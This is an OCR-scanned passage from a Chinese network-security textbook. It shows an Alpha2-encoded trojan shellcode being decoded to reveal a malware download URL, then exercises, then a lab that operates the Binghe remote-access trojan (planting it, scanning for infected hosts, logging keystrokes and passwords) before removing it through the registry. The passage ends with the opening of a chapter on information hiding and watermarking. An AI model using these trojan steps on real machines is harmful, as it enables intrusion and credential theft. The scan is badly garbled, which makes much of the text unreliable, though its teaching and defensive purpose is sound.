头 。 因 此 在 网 马 解密 时 ,获取 的 恶意 网 址 源 代码 中 有 上 述 类 似 代码 ,就 说 明 其 使 用 的 加 密 方 
式 为 Alpha2。 

【 例 7-3】 解密 以 下 木马 。 


var arrl = ["c:\\Program 
Files\\NetMeeting\\..\\..\\WINDOWS\\Media\\chimes. wav", "c:\\Program 
Files\\NetMeeting\\testSnd. wav", "C:\\WINDOWS\\ system32\\BuzzingBee. wav","C:\\WINDOWS\\ 
clock. avi", "c:\\Program 
Files\\NetMeeting\\..\\..\\WINDOWS\\Media\\tada. wav", "C:\\HINDOWS\\system32\\LoopyMusic. 
wav" ]; 

Shellcode= ""; 

Shellcode = Shellcode + "TYIIIIIIIIIIIIIIII7QZjAXPOAOAkAAQ2AB2BBOBBABXP8ABuJI" ; 

Shellcode = Shellcode + "PfEqTCuBgEGoDUtR4CfjkvB40EDc3UUGbVib4Wo5we6VQVouXdcEN"; 

Shellcode = Shellcode + "eStEpfTc7nVoUBdrfnvts3c77r3VwZwyGw7rdj40S4DTww6tuOUw" ; 

Shellcode = Shellcode + "2F4StTUZvkFiwxQvtsud7Z6BviR1gxUZ4IVgTBfRWygPfouZtCwW" ; 

Shellcode = Shellcode + "qvRHptd4RPFZVOdoRWQgrWInRLO13FSQ2LQeautnasPntorNObOhFNPeT8Quopwp" ; 


解 : …Shellcode 以 TYIIIIIIIIIIIIIIII 开头 。 .木马 使 用 Alpha2 解密 。 

(1) 如 图 7-12 所 示 , 复 制 粘贴 Shellcode 内 容 至 FreShow 处 理 框 ,选择 解密 选项 为 
ALPHA2 , 单 击 * 解 码 ” 按 钮 进行 一 次 解密 ,解密 后 内 容 会 显示 在 结果 框 , 单 击 * 向 上 ?按钮 将 
结果 框 代码 上 翻 至 处 理 框 。 

网 状 太 ”WA ”| 点击 !|| 加 级 |] 




















© [ww] 量 | 四 引 丰 到 硬 到 向 上 
ol pm — 
Wi ed8DGOVwDOV7B - 

















图 7-12 Alpha2 网 马 第 一 次 解密 
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(2) 如 图 7-13 所 示 ,进行 二 次 解密 ,解密 选项 选择 ESC, 单 击 * 解 码 ? 按 钮 进行 二 次 解 
密 ,获得 网 马 下 载 地 址 : http://www/livalue. cn/nbx. exe。 





图 7-13 Alpha2 网 马 第 二 次 解密 


习 题 7 


7.1 恶意 代码 
1. 恶意 代码 是 ( ) ,主要 包括 (。 )、( jC I jC J 
2. 恶意 代码 的 3 个 主要 特征 是 什么 ? 恶意 代码 长 期 存在 的 原因 是 什么 ? 
3. 恶意 代码 两 个 显著 的 特点 是 ( )、(  )。 
4. 恶意 代码 的 整个 攻击 过 程 为 ( NE DR I WE WE Ww 
5. 简 述 恶意 代码 的 攻击 流程 。 
6. 生存 技术 主要 包括 ( )( )( ).( ) 。 
7. 反 静 态 分 析 技术 主要 包括 哪些 方面 ? 
8. 常见 的 攻击 技术 包括 ( Be Be Pe Bf yt .Dn 
9. 本 地 隐藏 包括 ( )( )( )( )(  )。 
10. 可 能 引起 缓存 区 溢出 的 C 函数 有 哪些 ? 
11. 溢出 攻击 的 核心 是 ( ”)。 
A. 修改 堆栈 记录 中 进程 的 返回 地 址 B. 利用 Shellcode 
C. 提升 用 户 进程 权限 D. 捕捉 程序 漏洞 
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12. 什么 是 网 络 蠕虫 ? 简 述 网 络 蠕虫 功能 结构 。 

13. 后 门 程序 是 ( ) ,逻辑 炸弹 是 ( 机 

7.2 计算 机 病毒 

1. 计算 机 病毒 是 ( ) 。 

2. 按照 计算 机 病毒 存在 的 媒体 进行 分 类 ,病毒 可 以 划分 为 ( Ni yd 
3. 根据 病毒 特有 的 算法 进行 分 类 ,病毒 可 以 划分 为 哪些 ? 
4. 按 病毒 人 侵 的 方式 可 以 分 为 ( 两 Js 区 网 
5. 计算 机 病毒 的 基本 特征 包括 ( yt bE ja Da 
6. 通常 计算 机 病毒 组 成 分 别 为 ( )s€ yt yi 
7. 检测 计算 机 病毒 的 方法 主要 有 哪些 ? 
7.3 特洛伊 木马 
1. 什么 是 特洛伊 木马 ? 
2. 特洛伊 木马 分 为 哪些 ? 
3. 简 述 特洛伊 木马 的 运行 机 制 。 
4. 什么 是 网 页 挂 马 ? 
5. 网 页 挂 马 的 传播 方式 主要 有 哪些 ? 
6. 网 页 挂 马 的 检测 方式 主要 有 哪些 ? 





实验 6 冰河 木马 攻击 与 防范 


【实验 目的 】 


(1) 认识 木马 攻击 的 原理 ,理解 和 掌握 木马 传播 和 运行 的 机 制 ; 通过 手动 删除 木马 ， 
掌握 检查 木马 和 删除 木马 的 技巧 ,学 会 防御 木马 的 相关 知识 ,加 深 对 木马 的 安全 防范 
意识 。 

(2) 构建 一 个 具有 漏洞 的 服务 器 ,利用 漏洞 对 服务 器 进行 人 侵 或 攻击 ; 

(3) 利用 网 络 安 全 工具 对 入 侵 与 攻击 进行 检测 ; 

(4) 有 效 对 漏洞 进行 修补 ,提高 系统 的 安全 性 ,避免 同 种 攻击 的 威胁 。 


【实验 内 容 和 要 求 】 


冰河 木马 一 般 由 两 个 文件 组 成 : G_Client 和 G_Server。 其 中 G_Server 是 木马 的 服务 
器 端 , 即 用 来 植 入 目标 主机 的 程序 ,G_Client 是 木马 的 客户 端 ,就 是 木马 的 控制 端 。 

(1) 选择 一 台 主 机 作为 木马 的 服务 器 端 ,将 冰河 木马 的 两 个 文件 复制 到 此 主机 ,运行 
G_Serever 作 为 服务 器 端 。 

运行 G_Client 和 G_Server 会 导致 主机 防火 墙报 警 ,需要 按 图 7-14 将 其 加 入 信任 程序 
列表 后 再 次 运行 。 

(2) 选择 另外 一 台 主 机 作为 木马 的 控制 端 ,将 冰河 木马 的 两 个 文件 复制 到 此 主机 ,运行 
G_Client 作为 控制 端 。 控 制 端 主 界面 如 图 7-15 所 示 。 
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Je 信任 的 程序 和 文件 查看 详情 操作 
= service kms.exe _ 
信任 的 程序 4 El dmspicoservice kms.exe 信任 文件 ( 不 扫 擅 , 不 拦 葵 ) 移 除 
信任 的 网 址 binghemuma(1).rar 用 
bs dA2345 下 载 \binghemumal1).rar 。 ”信任 文件 (不 扫 府 ,不 尖 禾 ) 移 除 
阻止 列表 
9_clientexe 
一 di\binghemuma\g_client.exe 信任 文件 ( 不 扫描 , 不 拦 项 ) 移 除 
阻止 的 程序 
9 serverexe 
阻止 的 网 址 过 di\binghemuma\g_server.exe 信任 文件 ( 不 扫 科 ,不 拦 蕊 ) 移 除 
图 7-14 信任 列表 
-上 口 [x 


文件 [[] 。 编辑 [E] 。 设置 [G] ”帮助 [H] 


TPE 
当前 连接 : [a9 113 一] 端 D: Pe | 访 aS:[ ” | 应 用 [s] 
EL , 







































自 避 $360Section 
gO $CetCurrent 
由 占 $ecycle. Bin 


国 ,. 

回 $360Section 
$cetCurrent 
Recycle. Bin 
360SANDBOX 

加 42d5ac67139..， 
Boot 
Bdlcache 
Docunents a... 
后 cTTA 

扬 hp_1j1020_F... 








图 7-15 控制 端 主 界面 


(3) 单 击 图 7-15 左上 方 的 “搜索 计算 机 ?按钮 更 ,弹出 如 图 7-16 所 示 的 界面 。 在 “起 始 
域 " 中 填 和 人 实验 室 局 域 网 地 址 (例如 192. 9. 1) 后 单 击 “开始 搜索 ”按钮 ,搜索 结果 显示 在 “ 搜 
索 结 果 ” 框 中 。 其 中 主机 IP 地 址 前 标 有 OK 的 主机 已 被 冰河 木马 感染 ,应 作为 攻击 的 对 象 。 
如 图 7-16 中 的 129. 1. 133 主机 。 








到 9FH 人 Ph [el | 

| 搜索 范围 一 搜索 结果 : 
= 和 
延 R 时 间 : |2000 训 秒 : 129. 9.1.15 
son IE 

| 起 始 地 址 : 
终止 地 址 ， [5 

[= 

[lx | | 


x 


| 对 子 网 '129.9.1 搜索 完毕 ， 共 找到 9 台 计 算 机 ， 其 中 1 台 避 
7-16 扫描 主机 
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(4) 单 击 图 7-15 左上 的 ?添加 主机 ”按钮 开 ,弹出 ES | 
如 图 7-17 所 示 的 界面 , 填 和 人 对 应 参数 :“ 显 示 名 称 ” 填 


入 需要 显示 在 主 界面 的 名 称 ;“ 主 机 地 址 ” 填 人 选 定 的 ”| gg 生 ， [一] 
服务 器 端 主机 IP 地 址 ,图 中 为 192. 9. 1. 133;“ 访 问 口 主机 地 址 : J 











令 " 填 入 每 次 访问 主机 的 密码 ,默认 为" 空 ”， “监听 端 | sg， 一 一 一 
口 " 填 入 将 要 监听 端口 ,默认 监听 端口 是 7626, 控 制 端 | ， 二 一 
可 以 修改 它 以 绕 过 防火 墙 。 a 

连接 成 功 后 就 会 显示 图 7-15 中 服务 器 端 主机 上 的 二 二 
盘 符 。 这 时 就 可 以 像 操作 自己 的 计算 机 一 样 远程 操作 Exe 
目标 计算 机 了 。 图 7-17 添加 主机 


(5) 依次 单 击 图 7-15 中 “设置 "1“ 配 置 服务 器 程 
序 ” 命 令 , 出 现 图 7-18 所 示 的 界面 ,在 “基本 设置 "选项 卡 中 选择 相应 参数 后 单 击 “ 自 我 保护 ” 
选项 卡 ,弹出 如 图 7-19 所 示 的 界面 ,选择 相应 参数 。 参 数 设置 完成 后 ,依次 单 击 “ 确 定 ” 和 
“关闭 ”按钮 完成 服务 器 配置 。 


加 基本 设置 | 一 自我 保护 | 备 邮件 通知 | 


安装 路 径 : CaO 文件 名 称 : |ERNEL32 EE 
进程 名 称 。 EGG baos, OSI 
敏感 字符 : | 口令 , 罕 码 , , password, connect, account, 1ogin 1ogon 

提示 信息 [ES 
监听 端口: [626 





所 禁止 自动 拨号 





Nh .| 2 
图 7-18 服务 器 配置 一 


， 加 加 
贺 基本 设置 一 自我 保护 | 香 邮件 通知 | 


「 是 否 写 入 注册 表 的 启动 项 ,以 便 使 冰河 在 开机 时 自动 加 载 
同 写 入 注册 来 启动 项 键 名 : 








[是 否 将 冰河 与 文件 类 型 相关 联 ， 以 便 被 删除 后 在 打开 相关 文件 时 自动 恢复 


后 医 晨 。 关联 类 型 ， 有 >] 。 关联 文件 名 ， 必 SEEREE 














竺 配置 文 件 SERVEREXE .| 关闭 


图 7-19 服务 器 配置 二 


268 网 络 安全 教程 与 实践 (第 2 版 ) 





(6) 冰河 大 部 分 功能 都 是 在 “命令 控制 台 ” 实 现 的 , 单 击 “ 命 令 控 制 台 ” 弹 出 如 图 7-20 所 
示 的 命令 控制 界面 。 
|- lolx 
文件 Esc EU 
Fr 


| 党: rm =] Wo: FE ians: | 应 用 四 
各 文件 管理 器 吧 二 | 

















口 
ne PE 


lashR or 
iy 4 [NEWFUN 寺 版 ] 








| 司 据 流 接收 完毕 4 
图 7-20 命令 控制 台 界面 


展开 命令 控制 台 , 分 为 “口令 类 命令 “控制 类 命令 “网络 类 命令 ”。 

使 用 口令 类 命令 可 查看 远程 主机 的 系统 信息 、 开 机 口令 ,缓存 口令 等 ; 也 可 查看 远程 主 
机 用 户 击 键 记录 。 据 此 可 以 分 析出 远程 主机 的 各 种 账号 和 口令 或 各 种 秘密 信息 。 截 屏 记 录 
每 个 操作 的 结果 。 

(7) 使 用 控制 类 命令 捕获 远程 主机 屏幕 ,控制 远程 主机 上 的 窗口 进行 刷新 .最 大 化 、 最 
小 化 激活、 隐藏 等 操作 。 截 屏 记 录 每 个 操作 的 结果 。 图 7-20 为 执行 “进程 管理 ”后 查看 服 
务 器 端 进程 的 情况 ,可 以 看 到 存在 “冰河 V8. 4LNEWEFUN 专 版 ]” 和 “Kernel32” 两 个 进程 ， 
说 明 其 已 被 冰河 木马 感染 。 

(8) 使 用 控制 类 命令 使 远程 主机 进行 关机 、 重 启 .重新 加 载 冰河 .自动 印 载 冰河 。 

(9) 手动 卸载 删除 冰河 木马 。 

手动 印 载 : 查看 注册 表 , 通 过 “开始 "| 运行” 命令 ,运行 regedit, 打 开 Windows 注册 表 
编辑 器 。 依 次 打开 子 键 目录 


HKEY_LOCAL_MACHINE\SOFTHARE\Microsoft\Windows\CruuentVersion\run 


在 目录 中 发 现 一 个 默认 的 键 值 : C:\WINNT\System32\kernel32. exe, 这 个 就 是 冰河 
木马 在 注册 表 中 加 入 的 键 值 ,将 它 删 除 。 
然后 依次 打开 子 键 目录 


HKEY_LOCAL MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Runservices 
在 目录 中 也 会 发 现 一 个 默认 键 值 : C: \WINNT\System32\kernel32. exe, 这 就 是 冰河 木马 


在 注册 表 中 加 入 的 键 值 ,删除 。 进 入 C: \WINNT\System32 目录 ,找到 冰河 的 两 个 可 执行 
文件 Kernel32. exe 和 Susexplr. exe, 删 除 。 
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修改 文件 关联 时 木马 常用 的 手段 ,冰河 木马 将 txt 文件 的 默认 打开 方式 由 notepad. exe 
改 为 木马 的 启动 程序 ,此 外 html、exe、zip、com 等 都 是 木马 的 目标 。 所 以 还 需要 恢复 注册 表 
中 的 txt 文件 关联 功能 。 将 注册 表 中 HKEY_CLASSES_ROOT\ txtfile\ shell\ open\ 
command 下 的 默认 值 , 由 中 木马 后 的 C:\ 和 WindowsN\SSystemNSusex-plr. exe%1 改 为 正常 
情况 下 的 C: \Windows\notepad. exe%1。 

提示 : (9) 中 目录 C: \WINNT\System32 为 默认 目录 ; 若 按 图 7-18 中 的 “安装 路 径 ” 定 
义 目录 , 则 “C: \WINNT\System32” 应 替换 为 “C: \WINNT\TEMP”。 
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本 章 学 习 要 求 

掌握 信息 隐藏 通用 模型 、 信 息 隐 藏 和 密码 学 的 区 别 ; 

掌握 图 像 数 字 水 印 谋 入 提取 算法 、 数 字 水 印 在 数字 版 权 保 护 中 的 重要 作用 ; 
掌握 数据 库 水 印 谋 入 提取 算法 、 使 用 数据 库 水 印证 明 数 据 存 储 所 有 权 的 方法 ; 
掌握 ECFF 抗 合谋 数字 指纹 编码 方法 和 检测 方法 数字 指 纹 抗 合谋 原理 ; 
掌握 数字 指纹 追踪 算法 、 数 字 指 纹 在 数字 资源 盗版 追踪 中 的 重要 作用 。 


ee 9 9 


8.1 信息 隐藏 


8.1.1 信息 隐藏 的 定义 


信息 隐藏 (Information Hiding) 是 将 秘密 信息 秘密 地 隐藏 于 另 一 非 机 密 的 文件 内 容 之 
中 ,其 形式 可 为 任何 一 种 数字 媒体 ,如 图 像 声音、 视频 或 一 般 的 文档 等 等 。 

信息 隐藏 基本 思想 起 源 于 古代 的 伪装 术 ( 密 写 术 ), 具 有 悠久 的 历史 ,表现 为 多 种 形式 。 
在 公元 前 440 年 的 古 希 腊 战 争 中 ,为 了 安全 传送 军事 情报 ,奴隶 主 就 弟 光 奴隶 的 头发 ,然后 ， 
将 密令 写 在 奴隶 的 头 上 ,等 到 头发 重新 长 出 来 后 ,再 让 他 去 盟友 家 串门 。 如 果 该 奴隶 在 中 途 
被 捕 , 那 么 纵然 搜 遍 全 身 的 每 一 角落 , 敌 方 也 找 不 到 任何 可 疑 之 处 ,只 能 认定 他 是 普通 奴隶 ， 
一 放 了 事 。 而 当 他 成 功 到 达 盟 友 家 后 ,只 需 将 他 再 次 剃 成 光头 ,就 可 轻松 读 出 情报 了 。 

我 国 的 谜语 也 是 一 种 信息 隐藏 形式 .“ 身 体 白 又 胖 , 常 在 泥 中 藏 ,浑身 是 蜂窝 , 生 熟 都 能 
尝 ”;“ 有 洞 不 见 虫 ,有 集 不 见 蜂 ,有 丝 不 见 看 , 撑 命 不见 人 ”。 两 者 的 答案 都 是 慕 。 

数学 中 也 存在 信息 隐藏 ,例如 .0 十 0 二 0= 一 无 所 获 ; 1X1=1= 一 成 不 变 ; 1 的 nn 次 方 = 
始终 如 一 ; 1 : 1= 不 相 上 下 ; 1 除 以 100== 百 里 挑 一 ; 1,2,3,4,5 一 屈指 可 数 ; 12345609 一 
七 零 八 落 ; 124678910 一 隔 三 岔 五 ; 2468 二 无 独 有 偶 ; 1/2 一 一 分 为 二 。 

伴随 着 信息 安全 应 用 从 政治 军事 领域 向 商业 领域 的 转变 ,信息 不 再 是 少数 系统 内 部 人 
员 拥 有 的 保密 信息 ,而 应 该 是 对 多 数 人 公开 的 公用 信息 ,需要 考虑 信息 安全 的 成 本 、 易 用 性 
等 内 容 ,信息 隐藏 技术 应 运 而 生 。 

信息 隐藏 广泛 应 用 于 秘密 通信 ,广播 监控 、 所 有 权 识 别 、 内 容 认 证 ,叛逆 者 追踪 \、 元 数据 
嵌入 复制 控制 等 多 方面 。 

1. 信息 隐藏 的 通用 模型 

我 们 称 待 隐藏 的 信息 为 秘密 信息 (secret message) , 它 可 以 是 版 权 信 息 或 秘密 数据 ,也 
可 以 是 一 个 序列 号 ; 而 公开 信息 则 称 为 载体 信息 (cover message) ,如 视频 .音频 片段 。 

这 种 信息 隐藏 过 程 一 般 由 密 钥 (Key) 来 控制 ,即使 用 秘 钥 通过 嵌入 算法 (Embedding 
algorithm) 将 秘密 信息 隐藏 于 公开 信息 中 .而 载体 信息 (隐藏 有 秘密 信息 的 公开 信息 ) 则 通 
过 通信 信道 ,公开 传输 检测 器 (Detector) 利 用 密 钥 从 载体 信息 中 检测 /恢复 出 秘密 信息 。 
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如 图 8-1 所 示 ,信息 隐藏 通用 模型 由 两 部 分 组 成 : 

(1) 信息 嵌入 算法 , 它 利用 密 钥 来 实现 秘密 信息 的 隐藏 。 

(2) 隐蔽 信息 检测 /提取 算法 (检测 器 ), 它 利用 密 钥 从 隐蔽 载体 中 检测 /恢复 出 秘密 信 
息 。 在 密 钥 未 知 的 前 提 下 ,第 三 者 很 难 从 隐秘 载体 中 得 到 或 删除 ,甚至 发 现 秘密 信息 。 











秘密 信息 秘密 信息 














1 











载体 信息 >| 嵌入 算法 








f 
通信 信道 | 一 | 检测 器 
f 


























密 钥 密 钥 








图 8-1 信息 隐藏 通用 模型 


2. 信息 隐藏 的 性 质 

信息 隐藏 不 同 于 传统 的 加 密 ,因为 其 目的 不 在 于 限制 正常 的 资料 存 取 , 而 在 于 保证 隐藏 
数据 不 被 侵犯 和 发 现 。 因 此 信息 隐藏 技术 必须 考虑 正常 的 信息 操作 所 造成 的 威胁 , 即 要 使 
机 密 资 料 对 正常 的 数据 操作 技术 具有 免疫 能 力 。 这 种 免疫 力 的 关键 是 要 使 隐藏 信息 部 分 不 
易 被 正常 的 数据 操作 (如 通常 的 信号 变换 操作 或 数据 压缩 ) 所 破坏 。 根 据 信 息 隐藏 的 目的 和 
技术 要 求 ,该 技术 存在 以 下 特性 : 

(1) 不 可 感知 性 (invisibility) 一 一 利用 人 类 视觉 系统 或 人 类 听觉 系统 属性 ,经 过 一 系列 
隐藏 处 理 , 使 目标 数据 没有 明显 的 降 质 现象 ,而 隐藏 的 数据 却 无 法 被 人 看 见 或 听见 。 不 可 感 
知性 也 称 透 明 性 。 

(2) 鲁 棒 性 (robustness) 一 一 不 因 隐 蔽 载体 的 某 种 改动 而 导致 隐藏 信息 丢失 的 能 力 。 
这 里 所 谓 改 动 包括 传输 过 程 中 的 信道 噪音 、 滤 波 操 作 、 重 采样 、 有 损 编码 压缩 ,D/A 或 A/D 
转换 等 。 

(3) 不 可 检测 性 (undetectability) 一 一 指 隐蔽 载体 与 原始 载体 具有 一 致 的 特性 。 如 具 
有 一 致 的 统计 噪声 分 布 等 ,以 便 使 非法 拦截 者 无 法 判断 是 否 有 隐蔽 信息 。 

(4) 自 恢 复 性 一 一 由 于 经 过 一 些 操 作 或 变换 后 ,可 能 会 使 隐蔽 载体 产生 较 大 的 破坏 ,如 
果 只 根据 留 下 的 数据 片段 仍 能 恢复 隐藏 信号 ,而且 恢复 过 程 不 需要 原始 载体 信号 ,这 就 是 所 
谓 的 自 恢复 性 。 

(5) 安全 性 (security) 一 一 指 隐 藏 算法 有 较 强 的 抗 攻 击 能 力 , 即 它 必 须 能 够 承受 一 定 程 
度 的 人 为 攻击 ,而 使 隐藏 信息 不 会 被 破坏 。 

对 多 媒体 内 容 的 保护 分 为 两 个 部 分 : 一 是 版 权 保护 ; 二 是 内 容 完 整 性 (真实 性 保护， 
即 认证 。 据 此 可 将 信息 隐藏 分 为 稳健 的 信息 隐藏 和 脆弱 的 信息 隐藏 两 大 类 。 前 者 进行 版 权 
标识 实现 版 权 保护 ,可 进一步 分 为 进行 版 权 识别 的 数字 水 印 和 进行 版 权 追 踪 的 数字 指纹 两 
类 ; 后 者 进行 内 容 认 证 。 


8.1.2 信息 隐藏 与 密码 学 


信息 隐藏 不 同 于 传统 的 密码 学 技术 。 对 加 密 通 信 而 言 , 可 能 的 监测 者 或 非法 拦截 者 可 
通过 截取 密 文 ,并 对 其 进行 破译 ,或 将 密 文 进 行 破坏 后 再 发 送 , 从 而 影响 机 密 信息 的 安全 ; 
但 对 信息 隐藏 而 言 ,可 能 的 监测 者 或 非法 拦截 者 则 难以 从 公开 信息 中 判断 机 密 信 息 是 否 存 
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在 ,难以 截获 机 密 信息 ,从 而 保证 机 密 信息 的 安全 。 

两 者 的 区 别 是 : 

(1) 隐藏 的 对 象 不 同 。 密 码 技术 主要 是 研究 如 何 将 机 密 信息 进行 特殊 的 编码 ,以 形成 
不 可 识别 的 密码 形式 ( 密 文 ) 进 行 传递 。 密 码 技术 隐藏 信息 的 内 容 , 但 不 隐藏 信息 的 存 
在 ; 信息 隐藏 则 主要 研究 如 何 将 某 一 机 密 信 息 秘密 隐藏 于 另 一 公开 的 信息 中 ,然后 通过 
公开 信息 的 传输 来 传递 机 密 信 息 。 信 息 隐 藏 不 但 隐藏 了 信息 的 内 容 , 而 且 隐 藏 了 信息 的 
存在 。 

(2) 保护 的 有 效 范围 不 同 。 加 密 的 保护 局 限 在 加 密 通 信 的 信道 中 或 其 他 加 密 状 态 下 ， 
而 信息 隐藏 不 影响 宿主 数据 的 使 用 ,只 是 在 需要 检测 隐藏 的 数据 时 才 进 行 检测 ,之 后 不 影响 
其 使 用 和 隐藏 信息 的 作用 。 

(3) 需要 保护 的 时 间 长 短 不 同 。 用 于 版 权 保 护 的 鲁 棒 水 印 要 求 有 较 长 时 间 的 保护 效 
力 ,可 存在 于 信息 的 整个 生命 周期 ,如 绝 大 部 分 嵌 有 数字 水 印 的 数字 作品 整个 生命 周期 都 不 
存在 版 权 纠纷 ; 而 对 加 密 保 护 的 信息 来 说 ,其 保护 仅 局 限于 信息 的 传输 、 存 储 阶段 ,在 其 发 
送 、 使 用 阶段 都 是 明文 状态 ,不 存在 保护 。 

(4) 对 数据 失真 的 容许 程度 不 同 。 多 媒体 内 容 的 版 权 保护 和 真实 性 认证 往往 容忍 一 定 
程度 的 失真 ,而 加 密 的 数据 不 容许 一 个 比特 的 改变 ,否则 无 法 脱 密 。 

密码 学 和 信息 隐藏 不 是 相互 矛盾 、 互 相 竞 争 的 技术 ,而 是 互补 的 。 对 加 密 通 信和 而 言 , 攻 
击 者 可 通过 截取 密 文 ,并 对 其 进行 破译 ,或 将 密 文 进行 破坏 后 再 发 送 , 从 而 影响 机 密 信息 的 
安全 ; 对 信息 隐藏 而 言 ,攻击 者 难以 从 众多 的 公开 信息 中 判断 是 否 存在 机 密 信息 ,增加 截获 
机 密 信息 的 难度 ,从 而 保证 机 密 信息 的 安全 。 

例如 ,如 果 使 用 网 络 传输 一 部 电影 ,比较 使 用 加 密 技术 和 信息 隐藏 技术 的 优 劣 ,说 明 如 
何 选择 使 用 加 密 技术 和 信息 隐藏 技术 ? 

加 密 解 密 需 要 增加 加 解密 软 硬 件 设备 ,要 实现 安全 分 发 ,需要 1 对 1 加 密 解 密 (为 每 个 
用 户 使 用 不 同 秘 钥 加 密 , 存 在 多 个 使 用 不 同 秘 钥 加 密 的 相似 副本 ,将 一 部 影片 加 密 多 次 。)， 
电影 数量 大 ,加 解密 费时 ,不 能 满足 实时 播放 的 要 求 ; 而 信息 隐藏 技术 (数字 水 印 ) 只 需 将 一 
部 影片 嵌入 一 次 水 印 ,就 可 实现 多 次 分 发 ,无须 增加 设备 。 

信息 隐藏 的 主要 推动 力 是 对 数字 版 权 保护 的 关注 。 随 着 音频 、 视 频 和 其 他 一 些 作 品 数 
字 化 浪潮 的 到 来 ,完美 的 复制 品 易于 得 到 ,导致 大 量 未 授权 复制 品 的 产生 ,这 受到 音乐 、 电 
影 .图 书 和 软件 出 版 业 的 广泛 关注 。 

信息 隐藏 主要 研究 工作 包括 数字 水 印 ( 隐 藏 版 权 信息 ) 和 数字 指纹 (隐藏 序列 号 ) ,它们 
的 区 别 是 前 者 用 于 起 诉 这 些 违 犯 者 ,后 者 用 于 判别 版 权 规定 的 违犯 者 。 


8.2 数字 水 印 技术 


数字 水 印 技术 是 近年 来 国际 学 术 界 兴起 的 一 个 前 沿 研究 领域 ,特别 是 在 网 络 技术 和 应 
用 迅速 发 展 的 今天 ,水 印 技术 的 研究 更 具 现 实意 义 。 水 印 技术 的 研究 着 重 于 鲁 棒 性 、 真 伪 鉴 
别 、 版 权证 明 、 网 络 快速 自动 验证 以 及 音频 和 视频 水 印 等 方面 ,并 将 与 数据 加 密 技 术 紧 密 结 
合 ,特别 是 鲁 棒 性 和 可 证 明 性 的 研究 。 
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水 印 的 鲁 棒 性 能 体现 了 水 印 在 数字 文件 中 的 生存 能 力 ,当前 的 绝 大 多 数 算法 虽然 均 具 
有 一 定 的 鲁 棒 性 ,但 是 如 果 同 时 施加 各 种 攻击 ,那么 这 些 算 法 均 会 失效 。 如 何 寻找 更 加 鲁 棒 
的 水 印 算法 仍 是 一 个 急需 解决 的 问题 。 另 外 当前 的 水 印 算法 在 提供 可 靠 的 版 权证 明 方面 或 
多 或 少 有 一 定 的 不 完善 性 ,因此 寻找 能 提供 完全 版 权 保护 的 数字 水 印 算法 也 是 一 个 重要 的 
研究 方向 。 

数字 水 印 技术 通过 在 数字 资源 中 隐藏 版 权 所 有 者 信息 (数字 水 印 ) 来 唯一 地 标识 版 权 所 
有 者 ,证 明 数 字 作品 的 版 权 ; 在 发 生 版 权 纠纷 时 ,通过 提取 其 中 的 水 印 判定 数字 作品 的 版 
权 。 数 字 水 印 技术 致力 于 数字 产品 的 版 权 认证 ,主要 用 于 对 解密 后 的 数字 资源 提供 进一步 
保护 ,检验 视频 版 权 的 合法 性 ,但 存在 视频 版 权 鉴 别 区 分 性 不 高 和 和 鲁 棒 性 不 强 的 问题 。 数 字 
水 印 技术 研究 的 重点 是 嵌入 技术 ,目的 是 保证 嵌入 信息 的 鲁 棒 性 。 数 字 水 印 与 数字 资源 是 
一 对 多 关系 ,版 权 所 有 者 在 数字 资源 中 嵌入 相同 数字 水 印 ,所 以 数字 水 印 技术 能 够 有 效 确定 
盗版 侵权 事件 发 生 但 无 法 追踪 到 盗版 者 ,不 能 有 效 阻止 数字 产品 的 非法 复制 。 

随 着 数字 技术 和 Internet 的 发 展 ,各 种 形式 的 多 媒体 数字 作品 (图 像 、 视 频 、 音 频 等 ) 纷 
纷 以 网 络 形式 发 表 , 其 版 权 保护 成 为 一 个 迫切 需要 解决 的 问题 。 

数字 水 印 (digital watermarking) 技 术 就 是 将 指定 的 数字 序列 号 文字、 图 像 标 志 等 版 
权 信息 嵌入 到 数据 产品 中 ,以 起 到 版 权 保护 、 秘 密 通 信 、 数 据 文件 的 真 伪 鉴 别 和 产品 标识 等 
作用 。 

数字 水 印 技术 通过 在 原始 数据 中 嵌入 秘密 信息 一 一 水 印 来 证 实 该 数据 的 所 有 权 。 这 种 
被 嵌入 的 水 印 可 以 是 一 段 文字 、 标 识 .序列 号 等 ,而 且 这 种 水 印 通常 是 不 可 见 或 不 可 察 的 , 它 
与 原始 数据 (如 图 像 .音频 、 视 频数 据 ) 紧 密 结合 并 隐藏 其 中 ,并 可 以 经 历 一 些 不 破坏 源 数据 
使 用 价值 或 商用 价值 的 操作 而 能 保存 下 来 。 

数字 水 印 技术 是 指 在 数字 化 的 数据 内 容 中 嵌入 不 明显 的 记号 。 被 戏 入 的 记号 通常 是 不 
可 见 或 不 可 察 的 ,但 是 通过 一 些 计 算 操 作 可 以 检测 或 者 提取 。 水 印 与 元 数据 (如 图 像 .音频 、 
视频 数据 ) 紧 密 结合 并 隐藏 其 中 ,成 为 源 数据 不 可 分 离 的 一 部 分 ,并 经 历 一些 不 破坏 源 数据 
使 用 价值 或 商用 价值 的 操作 而 存活 下 来 。 

数字 水 印 技术 除了 应 具备 信息 隐藏 技术 的 一 般 特点 外 ,还 有 着 其 固有 的 特点 和 研究 方 
法 。 在 数字 水 印 系统 中 ,隐藏 信息 的 丢失 , 即 意味 着 版 权 信息 的 丢失 ,从 而 也 就 失去 了 版 权 
保护 的 功能 ,也 就 是 说 ,这 一 系统 就 是 失败 的 。 数 字 水 印 的 目的 在 于 检查 盗版 行为 时 ,可 以 
从 数字 载体 中 提取 出 有 关 信 息 , 用 于 证 明 数 字 产 品 的 版 权 , 指 证 盗版 行为 。 在 大 多 数 情况 
下 ,只 需要 证 明 载体 中 存在 某 一 个 数字 水 印 , 不 需要 精确 地 恢复 隐藏 的 数字 水 印 。 由 此 可 
见 ,数字 水 印 技术 必须 具有 较 强 的 鲁 棒 性 、 安 全 性 和 透明 性 。 

由 于 数字 水 印 是 实现 版 权 保护 的 有 效 办 法 ,因此 如 今 已 成 为 多 媒体 信息 安全 研究 领域 
的 一 个 热点 ,也 是 信息 隐藏 技术 研究 领域 的 重要 分 支 。 


8.2.1 数字 水 印 模型 


数字 水 印 技术 包括 嵌入 、 检 测 和 提取 3 个 过 程 。 

说 入 模型 的 功能 是 将 水 印信 号 加 入 到 原始 数据 中 ,如 图 8-2 所 示 。 主 要 解决 两 个 问题 : 
一 是 数字 水 印 的 生成 ,可 以 是 一 串 伪 随机 数 ,也 可 以 是 指定 的 字符 串 、 图 标 等 ; 二 是 嵌入 算 
法 , 腐 入 方案 的 目标 是 使 数字 水 印 在 不 可 见 性 和 和 鲁 棒 性 之 间 找 到 一 个 较 好 的 折 中 。 
